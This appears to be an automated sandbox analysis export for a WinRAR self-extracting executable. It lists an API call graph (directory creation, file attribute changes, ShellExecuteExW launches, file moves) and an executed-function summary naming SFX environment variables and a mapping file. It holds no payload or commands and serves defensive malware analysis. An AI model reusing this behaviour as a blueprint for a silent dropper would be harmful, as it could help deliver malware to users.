88d1a1 24373 877cfb 24255->24373 24257 88b504 24257->24185 24259 88cd38 24258->24259 24260 889d1a 4 API calls 24259->24260 24261 88cd3d 24260->24261 24262 88cd45 GetWindow 24261->24262 24263 88b5d1 24261->24263 24262->24263 24266 88cd65 24262->24266 24263->24042 24263->24043 24264 88cd72 GetClassNameW 24817 8817ac CompareStringW 24264->24817 24266->24263 24266->24264 24267 88cdfa GetWindow 24266->24267 24268 88cd96 GetWindowLongW 24266->24268 24267->24263 24267->24266 24268->24267 24269 88cda6 SendMessageW 24268->24269 24269->24267 24270 88cdbc GetObjectW 24269->24270 24818 889d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24270->24818 24272 88cdd3 24819 889d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24272->24819 24820 889f5d 8 API calls ___scrt_fastfail 24272->24820 24275 88cde4 SendMessageW DeleteObject 24275->24267 24276->24054 24278 88a2e8 24277->24278 24279 88a30d 24277->24279 24821 8817ac CompareStringW 24278->24821 24281 88a31b 24279->24281 24282 88a312 SHAutoComplete 24279->24282 24285 88a7c3 24281->24285 24282->24281 24283 88a2fb 24283->24279 24284 88a2ff FindWindowExW 24283->24284 24284->24279 24286 88a7cd __EH_prolog 24285->24286 24287 871380 82 API calls 24286->24287 24288 88a7ef 24287->24288 24822 871f4f 24288->24822 24291 88a818 24293 871951 126 API calls 24291->24293 24292 88a809 24294 871631 84 API calls 24292->24294 24296 88a83a __vsnwprintf_l ___std_exception_copy 24293->24296 24295 88a814 24294->24295 24295->24083 24295->24088 24296->24295 24297 871631 84 API calls 24296->24297 24297->24295 24298->24066 24830 88ac74 PeekMessageW 24299->24830 24302 88cb88 24306 88cb93 ShowWindow SendMessageW SendMessageW 24302->24306 24303 88cbbc SendMessageW SendMessageW 24304 88cbf8 24303->24304 24305 88cc17 SendMessageW SendMessageW SendMessageW 24303->24305 24304->24305 24307 88cc4a SendMessageW 24305->24307 24308 88cc6d SendMessageW 24305->24308 24306->24303 24307->24308 24308->24086 24309->24144 24310->24169 24311->24175 24312->24178 24313->24184 24314->24191 24315->24122 24316->24140 24317->24118 24318->24108 24319->24199 24320->24196 24322 87a214 24321->24322 24323 87a238 24322->24323 24325 87a22b CreateDirectoryW 24322->24325 24324 87a180 4 API calls 24323->24324 24326 87a23e 24324->24326 24325->24323 24327 87a26b 24325->24327 24328 87a27e GetLastError 24326->24328 24329 87b66c 2 API calls 24326->24329 24331 87a27a 24327->24331 24334 87a444 24327->24334 24328->24331 24332 87a254 24329->24332 24331->24206 24332->24328 24333 87a258 CreateDirectoryW 24332->24333 24333->24327 24333->24328 24335 88e360 24334->24335 24336 87a451 SetFileAttributesW 24335->24336 24337 87a467 24336->24337 24338 87a494 24336->24338 24339 87b66c 2 API calls 24337->24339 24338->24331 24340 87a47b 24339->24340 24340->24338 24341 87a47f SetFileAttributesW 24340->24341 24341->24338 24342->24230 24343->24230 24344->24245 24345->24230 24346->24230 24347->24230 24349 87feba 24348->24349 24377 871789 24349->24377 24351 87fed2 24351->24249 24353 87fead 24352->24353 24354 871789 76 API calls 24353->24354 24355 87fed2 24354->24355 24355->24251 24357 877c72 __EH_prolog 24356->24357 24394 87c827 24357->24394 24359 877c8d 24360 88e24a new 8 API calls 24359->24360 24361 877cb7 24360->24361 24400 88440b 24361->24400 24364 877ddf 24365 877de9 24364->24365 24370 877e53 24365->24370 24429 87a4c6 24365->24429 24367 877f06 24367->24255 24368 877ec4 24368->24367 24435 876dc1 74 API calls 24368->24435 24370->24368 24372 87a4c6 8 API calls 24370->24372 24407 87837f 24370->24407 24372->24370 24374 877d09 24373->24374 24376 877d10 24373->24376 24375 881acf 84 API calls 24374->24375 24375->24376 24378 87179f 24377->24378 24389 8717fa __vsnwprintf_l 24377->24389 24379 8717c8 24378->24379 24390 876e91 74 API calls __vswprintf_c_l 24378->24390 24380 871827 24379->24380 24384 8717e7 ___std_exception_copy 24379->24384 24382 8935de 22 API calls 24380->24382 24386 87182e 24382->24386 24383 8717be 24391 876efd 75 API calls 24383->24391 24384->24389 24392 876efd 75 API calls 24384->24392 24386->24389 24393 876efd 75 API calls 24386->24393 24389->24351 24390->24383 24391->24379 24392->24389 24393->24389 24395 87c831 __EH_prolog 24394->24395 24396 88e24a new 8 API calls 24395->24396 24397 87c874 24396->24397 24398 88e24a new 8 API calls 24397->24398 24399 87c898 24398->24399 24399->24359 24401 884415 __EH_prolog 24400->24401 24402 88e24a new 8 API calls 24401->24402 24403 884431 24402->24403 24404 877ce6 24403->24404 24406 8806ba 78 API calls 24403->24406 24404->24364 24406->24404 24408 878389 __EH_prolog 24407->24408 24436 871380 24408->24436 24410 8783a4 24444 879ef7 24410->24444 24415 8783cf 24417 8783d3 24415->24417 24426 87a4c6 8 API calls 24415->24426 24428 87846e 24415->24428 24571 87bac4 CompareStringW 24415->24571 24567 871631 24417->24567 24421 8784ce 24470 871f00 24421->24470 24424 8784d9 24424->24417 24474 873aac 24424->24474 24484 87857b 24424->24484 24426->24415 24463 878517 24428->24463 24430 87a4db 24429->24430 24434 87a4df 24430->24434 24805 87a5f4 24430->24805 24432 87a4ef 24433 87a4f4 FindClose 24432->24433 24432->24434 24433->24434 24434->24365 24435->24367 24437 871385 __EH_prolog 24436->24437 24438 87c827 8 API calls 24437->24438 24439 8713bd 24438->24439 24440 88e24a new 8 API calls 24439->24440 24443 871416 ___scrt_fastfail 24439->24443 24441 871403 24440->24441 24442 87b07d 82 API calls 24441->24442 24441->24443 24442->24443 24443->24410 24445 879f0e 24444->24445 24446 8783ba 24445->24446 24572 876f5d 76 API calls 24445->24572 24446->24417 24448 8719a6 24446->24448 24449 8719b0 __EH_prolog 24448->24449 24459 871a00 24449->24459 24461 8719e5 24449->24461 24573 87709d 24449->24573 24451 871b50 24576 876dc1 74 API calls 24451->24576 24453 873aac 97 API calls 24457 871bb3 24453->24457 24454 871b60 24454->24453 24454->24461 24455 871bff 24455->24461 24462 871c32 24455->24462 24577 876dc1 74 API calls 24455->24577 24457->24455 24458 873aac 97 API calls 24457->24458 24458->24457 24459->24451 24459->24454 24459->24461 24460 873aac 97 API calls 24460->24462 24461->24415 24462->24460 24462->24461 24464 878524 24463->24464 24595 880c26 GetSystemTime SystemTimeToFileTime 24464->24595 24466 878488 24466->24421 24467 881359 24466->24467 24597 88d51a 24467->24597 24472 871f05 __EH_prolog 24470->24472 24471 871f39 24471->24424 24472->24471 24605 871951 24472->24605 24475 873abc 24474->24475 24476 873ab8 24474->24476 24477 873af7 24475->24477 24478 873ae9 24475->24478 24476->24424 24740 8727e8 97 API calls 3 library calls 24477->24740 24480 873b29 24478->24480 24739 873281 85 API calls 3 library calls 24478->24739 24480->24424 24482 873af5 24482->24480 24741 87204e 74 API calls 24482->24741 24485 878585 __EH_prolog 24484->24485 24486 8785be 24485->24486 24498 8785c2 24485->24498 24764 8884bd 99 API calls 24485->24764 24487 8785e7 24486->24487 24491 87867a 24486->24491 24486->24498 24488 878609 24487->24488 24487->24498 24765 877b66 151 API calls 24487->24765 24488->24498 24766 8884bd 99 API calls 24488->24766 24491->24498 24742 875e3a 24491->24742 24494 878705 24494->24498 24748 87826a 24494->24748 24497 878875 24499 87a4c6 8 API calls 24497->24499 24500 8788e0 24497->24500 24498->24424 24499->24500 24752 877d6c 24500->24752 24502 87c991 80 API calls 24505 87893b _memcmp 24502->24505 24503 878a70 24504 878b43 24503->24504 24512 878abf 24503->24512 24509 878b9e 24504->24509 24517 878b4e 24504->24517 24505->24498 24505->24502 24505->24503 24506 878a69 24505->24506 24767 878236 82 API calls 24505->24767 24768 871f94 74 API calls 24505->24768 24769 871f94 74 API calls 24506->24769 24510 878b30 24509->24510 24772 8780ea 96 API calls 24509->24772 24511 878c09 24510->24511 24518 878b9c 24510->24518 24520 879989 GetFileType 24511->24520 24530 878c74 24511->24530 24558 8791c1 __except_handler4 24511->24558 24512->24510 24515 87a180 4 API calls 24512->24515 24513 879653 79 API calls 24513->24498 24514 879653 79 API calls 24514->24498 24519 878af7 24515->24519 24517->24518 24771 877f26 100 API calls __except_handler4 24517->24771 24518->24514 24519->24510 24770 879377 96 API calls 24519->24770 24522 878c4c 24520->24522 24521 87aa88 8 API calls 24524 878cc3 24521->24524 24522->24530 24773 871f94 74 API calls 24522->24773 24526 87aa88 8 API calls 24524->24526 24545 878cd9 24526->24545 24528 878c62 24774 877061 75 API calls 24528->24774 24530->24521 24531 878d9c 24532 878df7 24531->24532 24533 878efd 24531->24533 24534 878e69 24532->24534 24537 878e07 24532->24537 24535 878f23 24533->24535 24536 878f0f 24533->24536 24555 878e27 24533->24555 24538 87826a CharUpperW 24534->24538 24540 882c42 75 API calls 24535->24540 24539 8792e6 121 API calls 24536->24539 24541 878e4d 24537->24541 24546 878e15 24537->24546 24542 878e84 24538->24542 24539->24555 24544 878f3c 24540->24544 24541->24555 24777 877907 108 API calls 24541->24777 24550 878eb4 24542->24550 24551 878ead 24542->24551 24542->24555 24780 8828f1 121 API calls 24544->24780 24545->24531 24775 879b21 SetFilePointer GetLastError SetEndOfFile 24545->24775 24776 871f94 74 API calls 24546->24776 24779 879224 94 API calls __EH_prolog 24550->24779 24778 877698 84 API calls __except_handler4 24551->24778 24557 87904b 24555->24557 24781 871f94 74 API calls 24555->24781 24556 879156 24556->24558 24560 87a444 4 API calls 24556->24560 24557->24556 24557->24558 24559 879104 24557->24559 24758 879ebf SetEndOfFile 24557->24758 24558->24513 24759 879d62 24559->24759 24561 8791b1 24560->24561 24561->24558 24782 871f94 74 API calls 24561->24782 24564 87914b 24565 8796d0 75 API calls 24564->24565 24565->24556 24568 871643 24567->24568 24797 87c8ca 24568->24797 24571->24415 24572->24446 24578 8716d2 24573->24578 24575 8770b9 24575->24459 24576->24461 24577->24462 24579 8716e8 24578->24579 24590 871740 __vsnwprintf_l 24578->24590 24580 871711 24579->24580 24591 876e91 74 API calls __vswprintf_c_l 24579->24591 24582 871767 24580->24582 24587 87172d ___std_exception_copy 24580->24587 24584 8935de 22 API calls 24582->24584 24583 871707 24592 876efd 75 API calls 24583->24592 24586 87176e 24584->24586 24586->24590 24594 876efd 75 API calls 24586->24594 24587->24590 24593 876efd 75 API calls 24587->24593 24590->24575 24591->24583 24592->24580 24593->24590 24594->24590 24596 880c56 __vsnwprintf_l 24595->24596 24596->24466 24598 88d527 24597->24598 24599 87ddd1 53 API calls 24598->24599 24600 88d54a 24599->24600 24601 87400a _swprintf 51 API calls 24600->24601 24602 88d55c 24601->24602 24603 88cb5a 16 API calls 24602->24603 24604 881372 24603->24604 24604->24421 24606 871961 24605->24606 24608 87195d 24605->24608 24609 871896 24606->24609 24608->24471 24610 8718a8 24609->24610 24611 8718e5 24609->24611 24612 873aac 97 API calls 24610->24612 24617 873f18 24611->24617 24616 8718c8 24612->24616 24616->24608 24620 873f21 24617->24620 24618 873aac 97 API calls 24618->24620 24619 871906 24619->24616 24622 871e00 24619->24622 24620->24618 24620->24619 24634 88067c 24620->24634 24623 871e0a __EH_prolog 24622->24623 24642 873b3d 24623->24642 24625 871e34 24626 871ebb 24625->24626 24627 8716d2 76 API calls 24625->24627 24626->24616 24628 871e4b 24627->24628 24670 871849 76 API calls 24628->24670 24630 871e63 24632 871e6f 24630->24632 24671 88137a MultiByteToWideChar 24630->24671 24672 871849 76 API calls 24632->24672 24635 880683 24634->24635 24636 88069e 24635->24636 24640 876e8c RaiseException Concurrency::cancel_current_task 24635->24640 24638 8806af SetThreadExecutionState 24636->24638 24641 876e8c RaiseException Concurrency::cancel_current_task 24636->24641 24638->24620 24640->24636 24641->24638 24643 873b47 __EH_prolog 24642->24643 24644 873b5d 24643->24644 24645 873b79 24643->24645 24701 876dc1 74 API calls 24644->24701 24647 873dc2 24645->24647 24650 873ba5 24645->24650 24718 876dc1 74 API calls 24647->24718 24649 873b68 24649->24625 24650->24649 24673 882c42 24650->24673 24652 873c26 24653 873cb1 24652->24653 24669 873c1d 24652->24669 24704 87c991 24652->24704 24686 87aa88 24653->24686 24654 873c22 24654->24652 24703 872034 76 API calls 24654->24703 24656 873bf4 24656->24652 24656->24654 24657 873c12 24656->24657 24702 876dc1 74 API calls 24657->24702 24660 873cc4 24663 873d3e 24660->24663 24664 873d48 24660->24664 24690 8792e6 24663->24690 24710 8828f1 121 API calls 24664->24710 24667 873d46 24667->24669 24711 871f94 74 API calls 24667->24711 24712 881acf 24669->24712 24670->24630 24671->24632 24672->24626 24674 882c51 24673->24674 24676 882c5b 24673->24676 24719 876efd 75 API calls 24674->24719 24677 882ca2 ___std_exception_copy 24676->24677 24680 882c9d Concurrency::cancel_current_task 24676->24680 24685 882cfd ___scrt_fastfail 24676->24685 24678 882da9 Concurrency::cancel_current_task 24677->24678 24679 882cd9 24677->24679 24677->24685 24722 89157a RaiseException 24678->24722 24720 882b7b 75 API calls 3 library calls 24679->24720 24721 89157a RaiseException 24680->24721 24684 882dc1 24685->24656 24687 87aa95 24686->24687 24689 87aa9f 24686->24689 24688 88e24a new 8 API calls 24687->24688 24688->24689 24689->24660 24691 8792f0 __EH_prolog 24690->24691 24723 877dc6 24691->24723 24694 87709d 76 API calls 24695 879302 24694->24695 24726 87ca6c 24695->24726 24697 87935c 24697->24667 24698 879314 24698->24697 24700 87ca6c 114 API calls 24698->24700 24735 87cc51 97 API calls __vsnwprintf_l 24698->24735 24700->24698 24701->24649 24702->24669 24703->24652 24705 87c9c4 24704->24705 24706 87c9b2 24704->24706 24737 876249 80 API calls 24705->24737 24736 876249 80 API calls 24706->24736 24709 87c9bc 24709->24653 24710->24667 24711->24669 24713 881ad9 24712->24713 24714 881af2 24713->24714 24717 881b06 24713->24717 24738 88075b 84 API calls 24714->24738 24716 881af9 24716->24717 24718->24649 24719->24676 24720->24685 24721->24678 24722->24684 24724 87acf5 GetVersionExW 24723->24724 24725 877dcb 24724->24725 24725->24694 24732 87ca82 __vsnwprintf_l 24726->24732 24727 87cbf7 24728 87cc1f 24727->24728 24729 87ca0b 6 API calls 24727->24729 24730 88067c SetThreadExecutionState RaiseException 24728->24730 24729->24728 24733 87cbee 24730->24733 24731 8884bd 99 API calls 24731->24732 24732->24727 24732->24731 24732->24733 24734 87ab70 89 API calls 24732->24734 24733->24698 24734->24732 24735->24698 24736->24709 24737->24709 24738->24716 24739->24482 24740->24482 24741->24480 24743 875e4a 24742->24743 24783 875d67 24743->24783 24746 875e7d 24747 875eb5 24746->24747 24788 87ad65 CharUpperW CompareStringW 24746->24788 24747->24494 24749 878289 24748->24749 24794 88179d CharUpperW 24749->24794 24751 878333 24751->24497 24753 877d7b 24752->24753 24754 877dbb 24753->24754 24795 877043 74 API calls 24753->24795 24754->24505 24756 877db3 24796 876dc1 74 API calls 24756->24796 24758->24559 24760 879d73 24759->24760 24763 879d82 24759->24763 24761 879d79 FlushFileBuffers 24760->24761 24760->24763 24761->24763 24762 879dfb SetFileTime 24762->24564 24763->24762 24764->24486 24765->24488 24766->24498 24767->24505 24768->24505 24769->24503 24770->24510 24771->24518 24772->24510 24773->24528 24774->24530 24775->24531 24776->24555 24777->24555 24778->24555 24779->24555 24780->24555 24781->24557 24782->24558 24789 875c64 24783->24789 24785 875d88 24785->24746 24787 875c64 2 API calls 24787->24785 24788->24746 24792 875c6e 24789->24792 24790 875d56 24790->24785 24790->24787 24792->24790 24793 87ad65 CharUpperW CompareStringW 24792->24793 24793->24792 24794->24751 24795->24756 24796->24754 24798 87c8db 24797->24798 24803 87a90e 84 API calls 24798->24803 24800 87c90d 24804 87a90e 84 API calls 24800->24804 24802 87c918 24803->24800 24804->24802 24806 87a5fe 24805->24806 24807 87a691 FindNextFileW 24806->24807 24808 87a621 FindFirstFileW 24806->24808 24809 87a6b0 24807->24809 24810 87a69c GetLastError 24807->24810 24811 87a638 24808->24811 24816 87a675 24808->24816 24809->24816 24810->24809 24812 87b66c 2 API calls 24811->24812 24813 87a64d 24812->24813 24814 87a651 FindFirstFileW 24813->24814 24815 87a66a GetLastError 24813->24815 24814->24815 24814->24816 24815->24816 24816->24432 24817->24266 24818->24272 24819->24272 24820->24275 24821->24283 24823 879ef7 76 API calls 24822->24823 24824 871f5b 24823->24824 24825 8719a6 97 API calls 24824->24825 24828 871f78 24824->24828 24826 871f68 24825->24826 24826->24828 24829 876dc1 74 API calls 24826->24829 24828->24291 24828->24292 24829->24828 24831 88acc8 GetDlgItem 24830->24831 24832 88ac8f GetMessageW 24830->24832 24831->24302 24831->24303 24833 88acb4 TranslateMessage DispatchMessageW 24832->24833 24834 88aca5 IsDialogMessageW 24832->24834 24833->24831 24834->24831 24834->24833 24875 88b8e0 93 API calls _swprintf 24876 888ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24879 8a16e0 CloseHandle 24836 88e1f9 24837 88e203 24836->24837 24838 88df59 ___delayLoadHelper2@8 19 API calls 24837->24838 24839 88e210 24838->24839 24928 88ebf7 20 API calls 24929 871f05 126 API calls __EH_prolog 24883 88ec0b 28 API calls 2 library calls 24931 88db0b 19 API calls ___delayLoadHelper2@8 22950 88c40e 22952 88c4c7 22950->22952 22959 88c42c _wcschr 22950->22959 22951 88c4e5 22955 88ce22 18 API calls 22951->22955 22968 88be49 _wcsrchr 22951->22968 22952->22951 22952->22968 23005 88ce22 22952->23005 22955->22968 22956 88ca8d 22957 8817ac CompareStringW 22957->22959 22959->22952 22959->22957 22960 88c11d SetWindowTextW 22960->22968 22965 88bf0b SetFileAttributesW 22966 88bfc5 GetFileAttributesW 22965->22966 22978 88bf25 ___scrt_fastfail 22965->22978 22966->22968 22970 88bfd7 DeleteFileW 22966->22970 22968->22956 22968->22960 22968->22965 22971 88c2e7 GetDlgItem SetWindowTextW SendMessageW 22968->22971 22974 88c327 SendMessageW 22968->22974 22979 8817ac CompareStringW 22968->22979 22980 88aa36 22968->22980 22984 889da4 GetCurrentDirectoryW 22968->22984 22989 87a52a 7 API calls 22968->22989 22990 87a4b3 FindClose 22968->22990 22991 88ab9a 76 API calls ___std_exception_copy 22968->22991 22992 8935de 22968->22992 22970->22968 22972 88bfe8 22970->22972 22971->22968 22986 87400a 22972->22986 22974->22968 22976 88c01d MoveFileW 22976->22968 22977 88c035 MoveFileExW 22976->22977 22977->22968 22978->22966 22978->22968 22985 87b4f7 52 API calls 2 library calls 22978->22985 22979->22968 22981 88aa40 22980->22981 22982 88ab16 22981->22982 22983 88aaf3 ExpandEnvironmentStringsW 22981->22983 22982->22968 22983->22982 22984->22968 22985->22978 23028 873fdd 22986->23028 22989->22968 22990->22968 22991->22968 22993 898606 22992->22993 22994 89861e 22993->22994 22995 898613 22993->22995 22997 898626 22994->22997 23003 89862f _abort 22994->23003 23108 898518 22995->23108 22998 8984de _free 20 API calls 22997->22998 23001 89861b 22998->23001 22999 898659 HeapReAlloc 22999->23001 22999->23003 23000 898634 23115 89895a 20 API calls _abort 23000->23115 23001->22968 23003->22999 23003->23000 23116 8971ad 7 API calls 2 library calls 23003->23116 23007 88ce2c ___scrt_fastfail 23005->23007 23006 88d08a 23006->22951 23007->23006 23008 88cf1b 23007->23008 23122 8817ac CompareStringW 23007->23122 23119 87a180 23008->23119 23012 88cf4f ShellExecuteExW 23012->23006 23017 88cf62 23012->23017 23014 88cf47 23014->23012 23015 88cf9b 23124 88d2e6 6 API calls 23015->23124 23016 88cff1 CloseHandle 23018 88d00a 23016->23018 23019 88cfff 23016->23019 23017->23015 23017->23016 23020 88cf91 ShowWindow 23017->23020 23018->23006 23024 88d081 ShowWindow 23018->23024 23125 8817ac CompareStringW 23019->23125 23020->23015 23023 88cfb3 23023->23016 23025 88cfc6 GetExitCodeProcess 23023->23025 23024->23006 23025->23016 23026 88cfd9 23025->23026 23026->23016 23029 873ff4 __vsnwprintf_l 23028->23029 23032 895759 23029->23032 23035 893837 23032->23035 23036 89385f 23035->23036 23037 893877 23035->23037 23052 89895a 20 API calls _abort 23036->23052 23037->23036 23039 89387f 23037->23039 23054 893dd6 23039->23054 23041 893864 23053 898839 26 API calls _abort 23041->23053 23046 893907 23063 894186 51 API calls 3 library calls 23046->23063 23047 873ffe GetFileAttributesW 23047->22972 23047->22976 23050 893912 23064 893e59 20 API calls _free 23050->23064 23051 89386f 23065 88ec4a 23051->23065 23052->23041 23053->23051 23055 89388f 23054->23055 23056 893df3 23054->23056 23062 893da1 20 API calls 2 library calls 23055->23062 23056->23055 23072 898fa5 GetLastError 23056->23072 23058 893e14 23093 8990fa 38 API calls __cftof 23058->23093 23060 893e2d 23094 899127 38 API calls __cftof 23060->23094 23062->23046 23063->23050 23064->23051 23066 88ec53 23065->23066 23067 88ec55 IsProcessorFeaturePresent 23065->23067 23066->23047 23069 88f267 23067->23069 23107 88f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23069->23107 23071 88f34a 23071->23047 23073 898fbb 23072->23073 23074 898fc7 23072->23074 23095 89a61b 11 API calls 2 library calls 23073->23095 23096 8985a9 20 API calls 3 library calls 23074->23096 23077 898fc1 23077->23074 23079 899010 SetLastError 23077->23079 23078 898fd3 23080 898fdb 23078->23080 23103 89a671 11 API calls 2 library calls 23078->23103 23079->23058 23097 8984de 23080->23097 23083 898ff0 23083->23080 23085 898ff7 23083->23085 23084 898fe1 23087 89901c SetLastError 23084->23087 23104 898e16 20 API calls _abort 23085->23104 23105 898566 38 API calls _abort 23087->23105 23088 899002 23090 8984de _free 20 API calls 23088->23090 23092 899009 23090->23092 23092->23079 23092->23087 23093->23060 23094->23055 23095->23077 23096->23078 23098 8984e9 RtlFreeHeap 23097->23098 23102 898512 __dosmaperr 23097->23102 23099 8984fe 23098->23099 23098->23102 23106 89895a 20 API calls _abort 23099->23106 23101 898504 GetLastError 23101->23102 23102->23084 23103->23083 23104->23088 23106->23101 23107->23071 23109 898556 23108->23109 23113 898526 _abort 23108->23113 23118 89895a 20 API calls _abort 23109->23118 23111 898541 RtlAllocateHeap 23112 898554 23111->23112 23111->23113 23112->23001 23113->23109 23113->23111 23117 8971ad 7 API calls 2 library calls 23113->23117 23115->23001 23116->23003 23117->23113 23118->23112 23126 87a194 23119->23126 23122->23008 23123 87b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23123->23014 23124->23023 23125->23018 23134 88e360 23126->23134 23129 87a1b2 23136 87b66c 23129->23136 23130 87a189 23130->23012 23130->23123 23132 87a1c6 23132->23130 23133 87a1ca GetFileAttributesW 23132->23133 23133->23130 23135 87a1a1 GetFileAttributesW 23134->23135 23135->23129 23135->23130 23137 87b679 23136->23137 23145 87b683 23137->23145 23146 87b806 CharUpperW 23137->23146 23139 87b692 23147 87b832 CharUpperW 23139->23147 23141 87b6a1 23142 87b6a5 23141->23142 23143 87b71c GetCurrentDirectoryW 23141->23143 23148 87b806 CharUpperW 23142->23148 23143->23145 23145->23132 23146->23139 23147->23141 23148->23145 24884 88ea00 46 API calls 6 library calls 23149 88db01 23150 88daaa 23149->23150 23152 88df59 23150->23152 23180 88dc67 23152->23180 23154 88df73 23155 88dfd0 23154->23155 23168 88dff4 23154->23168 23156 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23155->23156 23157 88dfdb RaiseException 23156->23157 23158 88e1c9 23157->23158 23160 88ec4a _ValidateLocalCookies 5 API calls 23158->23160 23159 88e0df 23165 88e19b 23159->23165 23167 88e13d GetProcAddress 23159->23167 23162 88e1d8 23160->23162 23161 88e06c LoadLibraryExA 23163 88e0cd 23161->23163 23164 88e07f GetLastError 23161->23164 23162->23150 23163->23159 23169 88e0d8 FreeLibrary 23163->23169 23166 88e0a8 23164->23166 23177 88e092 23164->23177 23191 88ded7 23165->23191 23170 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23166->23170 23167->23165 23171 88e14d GetLastError 23167->23171 23168->23159 23168->23161 23168->23163 23168->23165 23169->23159 23172 88e0b3 RaiseException 23170->23172 23175 88e160 23171->23175 23172->23158 23174 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23176 88e181 RaiseException 23174->23176 23175->23165 23175->23174 23178 88dc67 ___delayLoadHelper2@8 11 API calls 23176->23178 23177->23163 23177->23166 23179 88e198 23178->23179 23179->23165 23181 88dc99 23180->23181 23182 88dc73 23180->23182 23181->23154 23199 88dd15 23182->23199 23185 88dc94 23209 88dc9a 23185->23209 23188 88ec4a _ValidateLocalCookies 5 API calls 23189 88df55 23188->23189 23189->23154 23190 88df24 23190->23188 23192 88dee9 23191->23192 23193 88df0b 23191->23193 23194 88dd15 DloadLock 8 API calls 23192->23194 23193->23158 23195 88deee 23194->23195 23196 88df06 23195->23196 23197 88de67 DloadProtectSection 3 API calls 23195->23197 23218 88df0f 8 API calls 2 library calls 23196->23218 23197->23196 23200 88dc9a DloadUnlock 3 API calls 23199->23200 23201 88dd2a 23200->23201 23202 88ec4a _ValidateLocalCookies 5 API calls 23201->23202 23203 88dc78 23202->23203 23203->23185 23204 88de67 23203->23204 23206 88de7c DloadObtainSection 23204->23206 23205 88de82 23205->23185 23206->23205 23207 88deb7 VirtualProtect 23206->23207 23217 88dd72 VirtualQuery GetSystemInfo 23206->23217 23207->23205 23210 88dcab 23209->23210 23211 88dca7 23209->23211 23212 88dcaf 23210->23212 23213 88dcb3 GetModuleHandleW 23210->23213 23211->23190 23212->23190 23214 88dcc9 GetProcAddress 23213->23214 23216 88dcc5 23213->23216 23215 88dcd9 GetProcAddress 23214->23215 23214->23216 23215->23216 23216->23190 23217->23207 23218->23193 24932 89a918 27 API calls 3 library calls 24933 88be49 108 API calls 4 library calls 24934 876110 80 API calls 24935 89b710 GetProcessHeap 24885 871025 29 API calls pre_c_initialization 23233 879f2f 23234 879f44 23233->23234 23239 879f3d 23233->23239 23235 879f4a GetStdHandle 23234->23235 23243 879f55 23234->23243 23235->23243 23236 879fa9 WriteFile 23236->23243 23237 879f7c WriteFile 23238 879f7a 23237->23238 23237->23243 23238->23237 23238->23243 23241 87a031 23245 877061 75 API calls 23241->23245 23243->23236 23243->23237 23243->23238 23243->23239 23243->23241 23244 876e18 60 API calls 23243->23244 23244->23243 23245->23239 24937 891522 RaiseException 24886 88a430 73 API calls 24943 88be49 103 API calls 4 library calls 24944 88d34e DialogBoxParamW 24888 88ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24889 888c40 GetClientRect 24890 893040 5 API calls 2 library calls 24945 88be49 98 API calls 3 library calls 24891 8a0040 IsProcessorFeaturePresent 24946 889b50 GdipDisposeImage GdipFree __except_handler4 24893 898050 8 API calls ___vcrt_uninitialize 24021 879b59 24022 879bd7 24021->24022 24025 879b63 24021->24025 24023 879bad SetFilePointer 24023->24022 24024 879bcd GetLastError 24023->24024 24024->24022 24025->24023 24897 88fc60 51 API calls 2 library calls 24899 893460 RtlUnwind 24900 899c60 71 API calls _free 24901 899e60 31 API calls 2 library calls 24902 871075 82 API calls pre_c_initialization 24846 88d573 24847 88d580 24846->24847 24848 87ddd1 53 API calls 24847->24848 24849 88d594 24848->24849 24850 87400a _swprintf 51 API calls 24849->24850 24851 88d5a6 SetDlgItemTextW 24850->24851 24852 88ac74 5 API calls 24851->24852 24853 88d5c3 24852->24853 24905 885c77 121 API calls __vsnwprintf_l

                Executed Functions

                Function 0088D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 008800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008800E4
                  • Part of subcall function 008800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008800F6
                  • Part of subcall function 008800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00880127
                  • Part of subcall function 00889DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00889DAC
                  • Part of subcall function 0088A335: OleInitialize.OLE32(00000000), ref: 0088A34E
                  • Part of subcall function 0088A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088A385
                  • Part of subcall function 0088A335: SHGetMalloc.SHELL32(008B8430), ref: 0088A38F
                  • Part of subcall function 008813B3: GetCPInfo.KERNEL32(00000000,?), ref: 008813C4
                  • Part of subcall function 008813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008813D8
                • GetCommandLineW.KERNEL32 ref: 0088D61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088D643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088D654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 0088D68E
                  • Part of subcall function 0088D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088D29D
                  • Part of subcall function 0088D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088D2D9
                • CloseHandle.KERNEL32(00000000), ref: 0088D697
                • GetModuleFileNameW.KERNEL32(00000000,008CDC90,00000800), ref: 0088D6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,008CDC90), ref: 0088D6BE
                • GetLocalTime.KERNEL32(?), ref: 0088D6C9
                • _swprintf.LIBCMT ref: 0088D708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088D71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 0088D721
                • LoadIconW.USER32(00000000,00000064), ref: 0088D738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0088D789
                • Sleep.KERNEL32(?), ref: 0088D7B7
                • DeleteObject.GDI32 ref: 0088D7F0
                • DeleteObject.GDI32(?), ref: 0088D800
                • CloseHandle.KERNEL32 ref: 0088D843
                Strings
                Memory Dump Source
